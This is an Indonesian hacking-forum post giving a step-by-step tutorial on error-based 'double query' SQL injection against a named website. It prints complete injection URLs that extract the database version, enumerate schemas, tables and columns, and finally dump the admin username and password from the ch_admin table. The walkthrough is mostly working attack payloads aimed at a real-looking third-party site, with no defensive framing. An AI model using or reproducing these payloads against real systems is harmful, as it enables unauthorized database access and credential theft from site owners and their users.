07-01-2014, 01:36 PM
Assalamualaikum
bertemu lagi dengan saya, kali ini tutorial mengenai double query injection
target sensor yah
http://janda.com/pro.php?id=8
kasih tanda petik dan perhatikan error nya
[hide]
kemudian kita cari version nya dengan perintah
version nya : 5.0.96-log
sekarang cari database nya
hasilnya : information_schema
pada +LIMIT+0,1 kita ubah aja misal 1+1 2+1 dst
database: challanich
sekarang mencari tabel dari database challanich
beruntung langsung ada kata admin
table: ch_admin
sama seperti di atas limit 0+1 bisa di rubah seperti tadi
okay lanjut, sekarang melihat column dari table ch_admin
perhatikan warna merah yah
nah limit nya kitah ubah lagi
jadi kita simpulkan yang penting : user+password
sekarang dump
liat yang berwarna merah
[/hide]
okay sekian dan terima kasih
semoga bermanfaat
bertemu lagi dengan saya, kali ini tutorial mengenai double query injection
target sensor yah
http://janda.com/pro.php?id=8
kasih tanda petik dan perhatikan error nya
[hide]
Spoiler! :
kemudian kita cari version nya dengan perintah
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),+0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Spoiler! :
version nya : 5.0.96-log
sekarang cari database nya
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Spoiler! :
hasilnya : information_schema
pada +LIMIT+0,1 kita ubah aja misal 1+1 2+1 dst
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+1,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Spoiler! :
sekarang mencari tabel dari database challanich
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=0x6368616c6c616e696368+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Spoiler! :
beruntung langsung ada kata admin
table: ch_admin
sama seperti di atas limit 0+1 bisa di rubah seperti tadi
okay lanjut, sekarang melihat column dari table ch_admin
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Spoiler! :
perhatikan warna merah yah
nah limit nya kitah ubah lagi
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1= 1
Spoiler! :
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Spoiler! :
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+3,1))+from+information_schema.tables+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Spoiler! :
jadi kita simpulkan yang penting : user+password
sekarang dump
Code:
janda/pro.php?id=8+and+(select 1 from(select+count(*),concat((select+concat(user,0x3a,password,0x3a) from ch_admin+limit+0,1),floor(rand(0)*2))x from information_schema.tables+group by x)a) and 1=1
Spoiler! :
okay sekian dan terima kasih
semoga bermanfaat
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix